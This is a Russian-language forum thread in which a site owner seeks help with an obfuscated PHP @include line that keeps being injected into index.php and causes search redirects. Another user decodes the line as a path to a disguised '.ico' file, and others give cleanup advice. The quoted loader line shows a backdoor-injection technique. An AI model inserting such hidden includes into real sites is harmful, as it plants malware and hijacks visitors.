Jump to content
Sign in to follow this  
kate1987

В файл добавляется сторонний код

Recommended Posts

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

Share this post


Link to post
Share on other sites

плохо проверили и плохо почистили от вирусов

Share this post


Link to post
Share on other sites
12 минут назад, kate1987 сказал:

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

там посмотрите, куда ссылка ведет
<?   /*16736*/

@include "/var/www/royalassistants/royal-assistants.com/admin/model/sale/favicon_0931e1.ico";

/*16736*/  ?>

А вообще все проверять надо.

Edited by Kindzaza

Share this post


Link to post
Share on other sites

Проверила касперским, удалила все вирусные файлы. Но инклуд  этот все равно добавляется. Данных файлов на которые ссылается инклуд уже нет. Как и файлов типа saaplxah.php с троянами

 

Файлы еще раз были перезалиты и перепроверены. Редирект на левый сайт с гугла ушел.

Edited by kate1987

Share this post


Link to post
Share on other sites

сталкивался с такой проблемой. соседи по серверу заразные оказались, решилось все сменой хостинга.

 

ЗЫ посмотрите логи сервера

Share this post


Link to post
Share on other sites

Поменяла уже хостинг. Но мб не до конца почистила. Пока вирусные файлы не генерируются, но код инклуд добавляется.

Share this post


Link to post
Share on other sites
Цитата

Проверила касперским, удалила все вирусные файлы.

это плохой выбор в данном случае. Проверьте хотя бы айболитом

https://www.revisium.com/ai/

а вообще, если тот, кто получил доступ, имеет хоть какую-то квалификацию и желание, без проблем сделает себе вполне аккуратную, не вызывающую подозрений дырку, которую вы сканером не найдете. Только вдумчивым анализом логов, изменений  и пр.

Для начал стоит задуматься, как получилось, что для файлов разрешена запись:

Цитата

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

 

Edited by Shureg
  • +1 1

Share this post


Link to post
Share on other sites

Права на файл 644. Так что даже не знаю как код туда добавляется

Share this post


Link to post
Share on other sites
42 минуты назад, kate1987 сказал:

Права на файл 644. Так что даже не знаю как код туда добавляется

Поставьте 444 и тогда это действительно станет интересным вопросом, а 644 позволяют записывать владельцу.

Share this post


Link to post
Share on other sites

Уже не записывается. Видно что то не дочищено было. Спасибо

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.